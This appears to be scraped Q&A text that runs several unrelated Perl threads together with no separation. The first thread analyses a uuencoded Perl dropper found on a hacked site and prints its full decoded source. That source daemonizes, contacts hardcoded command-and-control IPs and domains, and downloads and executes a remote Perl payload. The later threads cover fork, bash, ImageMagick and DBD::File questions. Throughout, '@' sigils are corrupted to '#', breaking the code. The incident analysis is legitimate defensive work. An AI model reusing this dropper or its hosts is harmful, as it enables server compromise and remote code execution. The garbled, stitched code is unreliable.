I was cleaning out a client's site that got hacked after I had cleaned it once already, when I found a cron job pointing to a script in the server /tmp directory:
https://pastebin.com/uXCSXxdn
The first 6 lines look like this:
my $gVcoQXKQ='';$gVcoQXKQ.=$_ while(<DATA>);$gVcoQXKQ=unpack('u*',$gVcoQXKQ);$gVcoQXKQ=~s/295c445c5f495f5f4548533c3c3c3d29/616962786d6065606062697f7f7c6360/gs;eval($gVcoQXKQ);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD?"`](#$[("9M86EN*"D[
M"G-U8B!M86EN"GL*97AI="`P('5N;&5S<R!D969I;F5D("AM>2`D<&ED(#T#
The rest is just 121 more lines of that DATA block. I ran the file through Virustotal and it came back clean, but I am certain this is not a non-malicious file. Is there any way to safely decrypt it so I know where to look and see if it dropped another payload somewhere on the site?
If you want to see the deobfuscated code, here are the steps to do it. Note that what you will be doing is dangerous, because if you accidentally execute the code, your machine will be attacked. You are warned.
Note that these steps are for THIS EXAMPLE only. Other attack scripts may have other things in them. They may need other changes than what is detailed below.
Here are the steps for the original example that was posted.
Copy all of your program into original.pl. It will look like this:
my $gVcoQXKQ='';$gVcoQXKQ.=$_ while(<DATA>);$gVcoQXKQ=unpack('u*',$gVcoQXKQ);$gVcoQXKQ=~s/295c445c5f495f5f4548533c3c3c3d29/616962786d6065606062697f7f7c6360/gs;print($gVcoQXKQ);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
Change the eval on the first line to print. IF YOU DON'T CHANGE THE eval TO print, THEN THE NEXT STEP WILL PERFORM THE ATTACK ON YOUR MACHINE.
Now, run the program, after you have changed the eval to print.
perl original.pl > unencoded.pl
The new unencoded.pl program will look like this, with no indentation:
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
Now use the B::Deparse module to interpret and reformat the program. MAKE SURE YOU HAVE -MO=Deparse OR ELSE YOU WILL RUN THE ATTACK.
perl -MO=Deparse unencoded.pl > formatted.pl # Note the -MO=Deparse!!!
Running through the Deparse module will say:
unencoded.pl syntax OK
The new formatted.pl program will be a nicely formatted copy of the attacker's payload, 213 lines long, and you can examine what the script does. Note that the final program is still dangerous, because it is the attack program that the attacker wanted to run.
The format shown is simply uuencoding. I copied the pastebin-ed text, pasted it into https://www.browserling.com/tools/uudecode, which showed it's this not-actually-obfuscated Perl code:
#!/usr/bin/perl -w
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$| = 1; &main();
sub main
{
exit 0 unless defined (my $pid = fork);
exit 0 if $pid;
POSIX::setsid();
$SIG{$_} = "IGNORE" for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
umask 0;
chdir "/";
open (STDIN, "</dev/null");
open (STDOUT, ">/dev/null");
open (STDERR, ">&STDOUT");
my $url = ["5.135.42.98:80","ixjeunsdms.org:80","95.216.98.49:443","heyhajksds.com:443","skjfdnlakdp.net:80"];
my $rnd = ["a".."z", "A".."Z"]; $rnd = join ("", #$rnd[map {rand #$rnd}(1..(6 + int rand 5))]);
my $dir = "/var/tmp"; if (open (F, ">", "/tmp/$rnd")) { close F; unlink "/tmp/$rnd"; $dir ="/tmp"; }
my ($header, $content);
my ($link, $file, $id, $command, $timeout) = ("en.wikipedia.org", "index.html", 1, 96, 10);
foreach my $rs (#$url)
{
$header = "$dir/" . time; $content = $header . "1";
unlink $header if -f $header; unlink $content if -f $content;
&http($rs, $timeout, $header, $content, 0);
if (open (F, "<", $header))
{
flock F, 1;
my ($test, $task) = (0, "");
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$test ++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close"; $task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
}
close F;
($link, $file, $id, $command, $timeout) = &decxd($task) if $test == 2 && length $task;
}
unlink $header if -f $header; unlink $content if -f $content;
}
exit 0 if !defined $command || $command !~ /^16$/;
$header = "$dir/" . time; $content = "$dir/$file";
unlink $header if -f $header; unlink $content if -f $content;
&http($link, $timeout, $header, $content, 1);
my ($resp, $size) = ("000", 0);
if (open (F, "<", $header))
{
flock F, 1;
while (<F>)
{
s/^\s*([^\s]?.*)$/$1/;
s/^(.*[^\s])\s*$/$1/;
next unless length $_;
$resp = $1 if /^HTTP\S+\s+(\d\d\d)/;
}
close F;
}
$size = (stat $content)[7] if -f $content;
$size = 0 if !defined $size || $size !~ /^\d+$/;
if ($size > 0)
{
chmod 0755, $content;
system "perl $content >/dev/null 2>&1";
}
unlink $header if -f $header; unlink $content if -f $content;
foreach my $rs (#$url)
{
$header = "/dev/null"; $content = $header;
&http($rs, 10, $header, $content, 0, "$id.$resp.$size");
}
exit 0;
}
sub xorl
{
my ($line, $code, $xor, $lim) = (shift, "", 1, 16);
foreach my $chr (split (//, $line))
{
if ($xor == $lim)
{
$lim = 0 if $lim == 256;
$lim += 16;
$xor = 1;
}
$code .= pack ("C", unpack ("C", $chr) ^ $xor);
$xor ++;
}
return $code;
}
sub decxd
{
my $data = pack ("H*", shift);
#_ = unpack ("C5", substr ($data, 0, 5, ""));
return (&xorl(substr ($data, 0, shift, "")), &xorl(substr ($data, 0, shift, "")), #_);
}
sub http
{
my ($url, $timeout, $header, $content, $mode, $gecko) = #_;
$gecko = "20100101" if !defined $gecko || !length $gecko;
my ($host, $port, $path) = $url =~ /^([^\/:]+):*(\d*)?(\/?[^\#]*)/;
return unless $host;
my $addr = gethostbyname $host;
return unless $addr;
$port ||= 80;
$path ||= "/";
$addr = sockaddr_in($port, $addr);
my $readers = IO::Select->new() or return;
my $writers = IO::Select->new() or return;
my $buffer = join
(
"\x0D\x0A",
"GET $path HTTP/1.1",
"Host: $host",
"Cookie: PHPSESSID=295c445c5f495f5f4548533c3c3c3d29",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/$gecko Firefox/60.0",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.1",
"Accept-Language: en-us,en;q=0.8",
"Accept-Encoding: gzip, deflate",
"Accept-Charset: ISO-8859-1,utf-8;q=0.1,*;q=0.8",
"Connection: close",
"\x0D\x0A"
);
if ($mode)
{
$buffer = join
(
"\x0D\x0A",
"GET $path HTTP/1.0",
"Host: $host",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/$gecko Firefox/61.0",
"Accept: text/html,*/*",
"Connection: close",
"\x0D\x0A"
);
}
my $socket = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
return unless $socket;
$socket->blocking(0);
unless ($socket->connect($addr))
{
unless ($! == POSIX::EINPROGRESS)
{
close $socket;
return;
}
}
$writers->add($socket);
$timeout += time;
my $step = 0;
while (1)
{
IO::Select->select(undef, undef, undef, 0.02);
my $writable = (IO::Select->select(undef, $writers, undef, 0))[1];
foreach my $handle (#$writable)
{
if ($step == 0)
{
$step = 1 if $handle->connected;
}
if ($step == 1)
{
my $result = syswrite ($handle, $buffer);
if (defined $result && $result > 0)
{
substr ($buffer, 0, $result) = "";
if (!length $buffer)
{
$readers->add($handle);
$writers->remove($handle);
$step = 2;
}
}
elsif ($! == POSIX::EWOULDBLOCK)
{
next;
}
else
{
$timeout = 0;
}
}
}
my $readable = (IO::Select->select($readers, undef, undef, 0))[0];
foreach my $handle (#$readable)
{
next if $step < 2;
my $result;
if ($step == 2)
{
$result = sysread ($handle, $buffer, 8192, length $buffer);
}
else
{
$result = sysread ($handle, $buffer, 8192);
}
if (16384 < length $buffer)
{
$timeout = 0;
}
elsif (defined $result)
{
if ($result > 0)
{
if ($step == 2)
{
my $offset = index ($buffer, "\x0D\x0A\x0D\x0A");
next if $offset < 0;
if (open (F, ">>", $header))
{
flock F, 2;
binmode F;
print F substr ($buffer, 0, $offset);
close F;
}
substr ($buffer, 0, $offset + 4) = "";
$step = 3;
}
if ($step == 3)
{
if (length $buffer)
{
$buffer =~ s/%EHLO_VALUE%/295c445c5f495f5f4548533c3c3c3d29/gs;
if (open (F, ">>", $content))
{
flock F, 2;
binmode F;
print F $buffer;
close F;
}
$buffer = "";
}
}
next;
}
$timeout = 0;
}
elsif ($! == POSIX::EWOULDBLOCK)
{
next;
}
else
{
$timeout = 0;
}
}
if ($timeout < time)
{
foreach my $handle ($writers->handles, $readers->handles)
{
$writers->remove($handle) if $writers->exists($handle);
$readers->remove($handle) if $readers->exists($handle);
close $handle;
}
return;
}
}
}
The clues were a) recognising the distinctive format; b) also recognising the unpack('u*'). No machines, virtual or otherwise, were put at risk in this process.
The code has 5 URLs, and the http function implies it "phones home" to those, getting commands to execute in a Set-Cookie: PHPSESSIONID= header. I haven't analysed it further than that.
Replace eval with print to see what the script is running. The portion you provided generates readable code.
My first thought was to deparse it but that won't be of much use since most of the code is in the DATA block. You could replace the eval() function with print() and let the script decode it for you. You might end up needing deparse for what print gives you.
I am having an issue with my first attempt at using fork.
The script seems to run fine until I need it to exit the fork and return to the main script.
Instead it exits the script entirely.
my #files = glob( "./input/<Input subnets>.txt" ) or die "Can't open HostInventory$!"; # Open the Host Inventory csv files for parsing
foreach my $file ( #files ) {
open (CONFIG, '<', $file) or die "Can't <Input subnets>.txt$!";
my #lines = <CONFIG>;
chomp (#lines);
$m = scalar #lines / 10;
for ( $m ) {
s/\..*//g
};
for ( my $i = 0; $i < #lines; $i += $m ) {
# take a slice of elements from #files
my #lines4 = #lines[$i .. $i + $m];
if ( fork() == 0 ) {
for my $n ( #lines4 ) {
system("Nmap -dns-servers <IP of DNS server> -sn -v $n -oX ./input/ip360_DNS/ip360_DNS$n.xml --send-eth --reason");
}
exit;
}
}
wait for 0 .. #lines/$m;
}
At this point it should continue in the parent script and open a subroutine that parses the output of the scan. Instead it exits the script completely.
What am I doing wrong?
-=-=-=-=Update-=-=-=-=
I tried the Parallel::ForkManager example below. When run as a standalone process it work perfectly. I am running the code inside of a subroutine though and when I try that, the Perl interpreter crashes. Suggestions?
#1/usr/bin/perl -w
use Parallel::ForkManager;
use strict; # Best Practice
use warnings; # Best Practice
use Getopt::Long; # Add the ability to use command line options
if (!#ARGV) {
&help;
exit 1
}
GetOptions(
full => \&full,
temp => \&temp,
);
#######################################################################
#######################################################################
# #
# Call each function #
# #
#######################################################################
#######################################################################
sub temp {
&speak;
&simple;
&speak2;
exit;
}
sub full {
&speak;
&simple;
&speak2;
exit;
}
sub speak {
print "This is where I wait for 2 seconds\n";
sleep (2);
}
my $process = $$;
print "$process\n";
sub simple {
my $pm = new Parallel::ForkManager(10);
$pm->run_on_finish(
sub { $process;
print "** PID $process\n";
}
);
my #files = glob( "./ping.txt" ) or die "Can't open CMS HostInventory$!"; # Open the CMS Host Inventory csv files for parsing
foreach my $file (#files){
open (CONFIG, '<', $file) or die "Can't ip360_DNS File$!";
my #lines = <CONFIG>;
chomp (#lines);
foreach my $n (#lines) {
# Forks and returns the pid for the child:
my $pid = $pm->start and next;
# ... do some work with $data in the child process ...
system("ping $n >> ./input/$n.txt");
}
$pm->finish; # Terminates the child process
}
}
sub speak2 {
print "In new subroutine\n";
}
First of all, your script doesn't "exit completely". It does wait for the children to finish. Or at least some of them. Your calculations are a little off.
You're skipping the last elements.
$m = scalar #lines / 10;
for ($m) {s/\..*//g};
is equivalent to
use POSIX qw( floor );
my $m = floor(#lines / 10);
but it should be
use POSIX qw( ceil );
my $m = ceil(#lines / 10);
You're performing the boundary elements twice.
my #lines4 = #lines[$i .. $i + $m];
should be
my #lines4 = #lines[$i .. $i + $m - 1];
wait for 0 .. #lines/$m;
should be
use POSIX qw( ceil );
wait for 1 .. ceil(#lines/$m);
or just
1 while wait > 0;
Easier to use Parallel::ForkManager.
use Parallel::ForkManager qw( );
my $pm = Parallel::ForkManager->new(10); # Max number of children at a time.
$pm->run_on_finish(sub {
my ($pid, $exit, $id, $signaled, $dumped, $data) = #_;
my ($config_qfn, $target) = #$id;
...
});
for my $config_qfn (glob(...)) {
open(my $config_fh, '<', $config_qfn)
or die("Can't open \"$config_qfn\": $!\n");
chomp( my #targets = <$config_fh> );
for my $target (#targets) {
my $pid = $pm->start([$config_qfn, $target])
and next;
exec(...)
or die("exec: $!");
}
}
$pm->wait_all_children();
By the way, you may have noticed I stopped doing things in batches. This allowed me to use exec instead of system, which reduces the number of forks by one for each batch, making it more efficient to not use batches.
I have a growing number of files to process using a simple Perl script I wrote. The script takes two files as input and prints an output. I want to use a bash script (or anything really) to automate the following usage:
perl Program.pl GeneLevels_A GeneLevels_B > GeneLevels_A_B
with every paired, non-directional combination of files in a particular directory.
Here is the Perl script:
#!/usr/bin/perl
use strict;
use warnings;
die "Usage: $0 <File_1> <File_2>\n" unless #ARGV == 2;
my $file1 = shift #ARGV;
my $file2 = shift #ARGV;
my %hash1;
my %hash2;
my $counter = 0;
my $amt = 25;
my $start = 244 - $amt;
open (REF, $file1);
while (<REF>) {
my $line = $_;
chomp $line;
if ($counter < $start) {
$counter++;
next;
}
my #cells = split('\t', $line);
my $ID = $cells[2];
my $row = $cells[0];
$hash1{$ID} = $row;
$counter++;
}
close REF;
$counter = 0;
open (FILE, $file2);
while (<FILE>) {
my $line = $_;
chomp $line;
if ($counter < $start) {
$counter++;
next;
}
my #cells = split('\t', $line);
my $ID = $cells[2];
my $row = $cells[0];
$hash2{$ID} = $row;
$counter++;
}
close FILE;
while ( my ($key, $value) = each(%hash1) ) {
if ( exists $hash2{$key} ) {
print "$key\t$value\t$hash2{$key}\n";
}
}
A good solution would allow me to run the Perl script on every file with an appropriate suffix.
An even better solution would assess the suffixes of existing files to determine which pairs of files have already been processed this way and omit those. For example if File_A, File_B, File_C, and File_B_C exist then only File_A_B and File_A_C would be produced. Note that File_A_B and File_B_A are equivalent.
This should work. Better checks for bad arguments would be a good thing to add:
#!/bin/bash
if [ $# != 2 ]; then
echo "usage: pair <suffix1> <suffix2>"
exit
fi
suffix1=$1
suffix2=$2
for file1 in *_${suffix1}; do
fileCheck=$(echo $file1 | sed -e "s#_$suffix2##")
if [ "$fileCheck" = "$file1" ]; then
file2=${file1/_$suffix1/_$suffix2}
if [[ ( ! -f ${file1}_${suffix2} ) && ( ! -f ${file2}_${suffix1} ) ]]; then
echo processing ${file1}_${suffix2}
perl Program.pl $file1 $file2 > ${file1}_${suffix2}
fi
fi
done
I wrote a program to compare the image files of two folders(having 1000 files each) with some logic (see this SO question).
While executing it is comparing successfully until 900 images but then it gives an error like Use of uninitialized value within #tfiles2 in concatenation (.) or string at C:\dropbox\Image_Compare\image_magick.pl line 55 (#3).
And then I get a popup error like Perl Command Line Interpreter has stopped working, so I close the program.
My code is as follows:
#!/usr/bin/perl
use Image::Magick;
no warnings 'uninitialized';
use warnings;
use diagnostics;
#use strict;
use List::Util qw(first);
my $directory1="C:/dropbox/Image_Compare/folder1";
opendir(DIR, $directory1) or die "couldn't open $directory1: $!\n";
my #files1 = grep { (!/^\./) && -f "$directory1/$_" } readdir(DIR);
closedir DIR;
print #files1;
print 'end of files1';
my $directory2="C:/dropbox/Image_Compare/folder2";
opendir(DIR, $directory2) or die "couldn't open $directory2: $!\n";
my #files2= grep { (!/^\./) && -f "$directory2/$_" } readdir(DIR);
closedir DIR;
print #files2;
print 'end of files2';
print $files1[0];
foreach my $fils2 (#files2)
{
$g1 = Image::Magick->new;
$g2 = Image::Magick->new;
$temp1 = $g1->Read( filename=>"C:/dropbox/Image_Compare/folder1/".$files1[0]."");
$temp1 = $g2->Read( filename=>"C:/dropbox/Image_Compare/folder2/".$fils2."");
$g3 = $g1->Compare( image=>$g2, metric=>'AE' ); # compare
$error1 = $g3->Get( 'error' );
#print $error1;
if ($error1 == '0')
{
print "Matching image is:";
print $fils2 . "\n";
my $tdirectory2="C:/dropbox/Image_Compare/folder2";
opendir(DIR, $tdirectory2) or die "couldn't open $directory2: $!\n";
my #tfiles2 = grep { (!/^\./) && -f "$tdirectory2/$_" } readdir(DIR);
closedir DIR;
#my $index = firstidx { $_ eq'"' .$fils2.'"' } #tfiles2;
my $index = first { $tfiles2[$_] eq $fils2} 0..$#tfiles2;
#print $fils2;
print $index;
my $i=0;
foreach my $fils1 (#files1)
{
print 'ganesh';
print $files1[$i];
print $tfiles2[$index];
print 'gowtham'; print "<br />";
#print #tfiles2;
$g4 = Image::Magick->new;
$g5 = Image::Magick->new;
$temp2 = $g4->Read( filename=>"C:/dropbox/Image_Compare/folder1/".$files1[$i]."");
$temp2 = $g5->Read( filename=>"C:/dropbox/Image_Compare/folder2/".$tfiles2[$index]."");
$g6 = $g4->Compare( image=>$g5, metric=>'AE' ); # compare
$error2 = $g6->Get( 'error' );
$i++;
$index++;
if ($error2 == '0') {}
else {print "Image not matching:"; print $tfiles2[$index]; last;}
#if ($i == '800') {last;}
}
last
}
}
Can anyone please help, where i am doing a mistake.
Folder 1 file names: 0025.bmp to 1051.bmp;
Folder 2 file names: 0000.bmp to 1008.bmp;
Thanks
Ganesh
I don't know which the offending line is, but one of these is likely to be the candidate:
$temp2 = $g5->Read( filename=>"C:/dropbox/Image_Compare/folder2/".$tfiles2[$index]."");
or
else {print "Image not matching:"; print $tfiles2[$index]; last;}
Do note that you increment $index whether or not it is inside the array bounds. You do not check for the condition $index > $#tfiles, which should break the loop.
You might want to assert that both input arrays contain >> 900 elements, by printing the length like print "length: ", scalar #array, "\n";.
You can test at which index the undefined error actually happens by testing for definedness of the elements in the arrays:
if (not defined $tfiles[$index] or not defined $files1[$i]) {
die "There was an undefined element at index=$index, i=$i";
}
But then again, the offset between $i, and $index is constant (as mentioned in my answer), so you don't have to actually carry two variables.
A simple comparator subroutine could make your code more readable, thus aiding debugging (see procedural programming).
# return true if matching, false otherwise.
sub compare_images {
my ($file1, $file2) = #_;
my $image1 = Image::Magick->new;
$image1->Read(filename => $file1);
my $image2 = Image::Magick->new;
$image2->Read(filename => $file2);
my $result = $image1->Compare(image => $image2, metric => 'AE')->Get('error');
# free memory
undef $image1;
undef $image2;
return 0 == $result;
}
called like
my $image_root = "C:/dropbox/Image_Compare";
my ($folder1, $folder2) = qw(folder1 folder2);
unless (compare_images("$image_root/$folder1/$files1[$i]",
"$image_root/$folder2/$tfiles[$index]")) {
print "Images not matching at index=$index, i=$i\n";
print "filename: $tfiles[$index]\n";
last;
}
You could read your directories like
sub get_images_from_dir {
my ($dirname) = #_;
-d $dirname or die qq(The path "$dirname" doesn't point to a directory!);
opendir my $dir => $dirname or die qq(Can't open "$dirname": $!);
my #files = grep {!/^\./ and -f "$dirname/$_"} readdir $dir;
closedir $dir;
unless (#files) { die qq(There were no interesting files in "$dirname".) }
return #files;
}
Steps like these make code more readable and make it easy to insert checks.
This is from the DBD::File-documentation:
f_ext
This attribute is used for setting the file extension where (CSV) files are opened. There are several possibilities.
DBI:CSV:f_dir=data;f_ext=.csv
In this case, DBD::File will open only table.csv if both table.csv and table exist in the datadir. The table will still be named table. If your datadir has files with extensions, and you do not pass this attribute, your table is named table.csv, which is probably not what you wanted. The extension is always case-insensitive. The table names are not.
DBI:CSV:f_dir=data;f_ext=.csv/r
In this case the extension is required, and all filenames that do not match are ignored.
It was not possible for me to generate different behavior with the two options ".csv/r" and ".csv". Could someone show me an example, where I can see the difference between ".csv/r" and ".csv"?
I can't seem to get it to do anything different either. The relevant section of code is
sub file2table
{
my ($data, $dir, $file, $file_is_tab, $quoted) = #_;
$file eq "." || $file eq ".." and return;
my ($ext, $req) = ("", 0);
if ($data->{f_ext}) {
($ext, my $opt) = split m/\//, $data->{f_ext};
if ($ext && $opt) {
$opt =~ m/r/i and $req = 1;
}
}
(my $tbl = $file) =~ s/$ext$//i;
$file_is_tab and $file = "$tbl$ext";
# Fully Qualified File Name
my $fqfn;
unless ($quoted) { # table names are case insensitive in SQL
opendir my $dh, $dir or croak "Can't open '$dir': $!";
my #f = grep { lc $_ eq lc $file } readdir $dh;
#f == 1 and $file = $f[0];
closedir $dh or croak "Can't close '$dir': $!";
}
$fqfn = File::Spec->catfile ($dir, $file);
$file = $fqfn;
if ($ext) {
if ($req) {
# File extension required
$file =~ s/$ext$//i or return;
}
else {
# File extension optional, skip if file with extension exists
grep m/$ext$/i, glob "$fqfn.*" and return;
$file =~ s/$ext$//i;
}
}
$data->{f_map}{$tbl} = $fqfn;
return $tbl;
} # file2table
Does this demonstrate the difference?:
sandbox % echo "a,b,c" > foo
sandbox % echo "a,b,c" > foo.csv
sandbox % echo "a,b,c" > bar
sandbox % echo "a,b,c" > baz.csv
sandbox % perl -MDBI -wle'print for DBI->connect("dbi:CSV:f_ext=.csv")->tables'
"merijn".baz
"merijn".bar
"merijn".foo
sandbox % perl -MDBI -wle'print for DBI->connect("dbi:CSV:f_ext=.csv/r")->tables'
"merijn".baz
"merijn".foo
sandbox %
f_ext=.csv only makes the .csv a preference, but nor a requirement: in the first case, the file "bar" with no .csv extension is still used, but "foo.csv" is chosen over "foo". With f_ext=.csv/r", "bar" is ignored, as it has no ".csv" extension.
Now in version 0.39 of DBD::File this part looks like this:
sub file2table
{
my ($self, $meta, $file, $file_is_table, $respect_case) = #_;
$file eq "." || $file eq ".." and return; # XXX would break a possible DBD::Dir
my ($ext, $req) = ("", 0);
if ($meta->{f_ext}) {
($ext, my $opt) = split m/\//, $meta->{f_ext};
if ($ext && $opt) {
$opt =~ m/r/i and $req = 1;
}
}
# (my $tbl = $file) =~ s/$ext$//i;
my ($tbl, $dir, $user_spec_file);
if ($file_is_table and defined $meta->{f_file}) {
$tbl = $file;
($file, $dir, undef) = File::Basename::fileparse ($meta->{f_file});
$user_spec_file = 1;
}
else {
($tbl, $dir, undef) = File::Basename::fileparse ($file, $ext);
$user_spec_file = 0;
}
-d File::Spec->catdir ($meta->{f_dir}, $dir) or
croak (File::Spec->catdir ($meta->{f_dir}, $dir) . ": $!");
!$respect_case and $meta->{sql_identifier_case} == 1 and # XXX SQL_IC_UPPER
$tbl = uc $tbl;
!$respect_case and $meta->{sql_identifier_case} == 2 and # XXX SQL_IC_LOWER
$tbl = lc $tbl;
my $searchdir = File::Spec->file_name_is_absolute ($dir)
? $dir
: Cwd::abs_path (File::Spec->catdir ($meta->{f_dir}, $dir));
$searchdir eq $meta->{f_dir} and
$dir = "";
unless ($user_spec_file) {
$file_is_table and $file = "$tbl$ext";
# Fully Qualified File Name
my $cmpsub;
if ($respect_case) {
$cmpsub = sub {
my ($fn, undef, $sfx) = File::Basename::fileparse ($_, qr/\.[^.]*/);
$fn eq $tbl and
return (lc $sfx eq lc $ext or !$req && !$sfx);
return 0;
}
}
else {
$cmpsub = sub {
my ($fn, undef, $sfx) = File::Basename::fileparse ($_, qr/\.[^.]*/);
lc $fn eq lc $tbl and
return (lc $sfx eq lc $ext or !$req && !$sfx);
return 0;
}
}
opendir my $dh, $searchdir or croak "Can't open '$searchdir': $!";
my #f = sort { length $b <=> length $a } grep { &$cmpsub ($_) } readdir $dh;
#f > 0 && #f <= 2 and $file = $f[0];
!$respect_case && $meta->{sql_identifier_case} == 4 and # XXX SQL_IC_MIXED
($tbl = $file) =~ s/$ext$//i;
closedir $dh or croak "Can't close '$searchdir': $!";
#(my $tdir = $dir) =~ s{^\./}{}; # XXX We do not want all tables to start with ./
#$tdir and $tbl = File::Spec->catfile ($tdir, $tbl);
$dir and $tbl = File::Spec->catfile ($dir, $tbl);
my $tmpfn = $file;
if ($ext) {
if ($req) {
# File extension required
$tmpfn =~ s/$ext$//i or return;
}
# else {
# # File extension optional, skip if file with extension exists
# grep m/$ext$/i, glob "$fqfn.*" and return;
# $tmpfn =~ s/$ext$//i;
# }
}
}
my $fqfn = File::Spec->catfile ($searchdir, $file);
my $fqbn = File::Spec->catfile ($searchdir, $tbl);
$meta->{f_fqfn} = $fqfn;
$meta->{f_fqbn} = $fqbn;
!defined $meta->{f_lockfile} && $meta->{f_lockfile} and
$meta->{f_fqln} = $meta->{f_fqbn} . $meta->{f_lockfile};
$meta->{table_name} = $tbl;
return $tbl;
} # file2table
As far as I can see, the two f_ext-options are working as expected.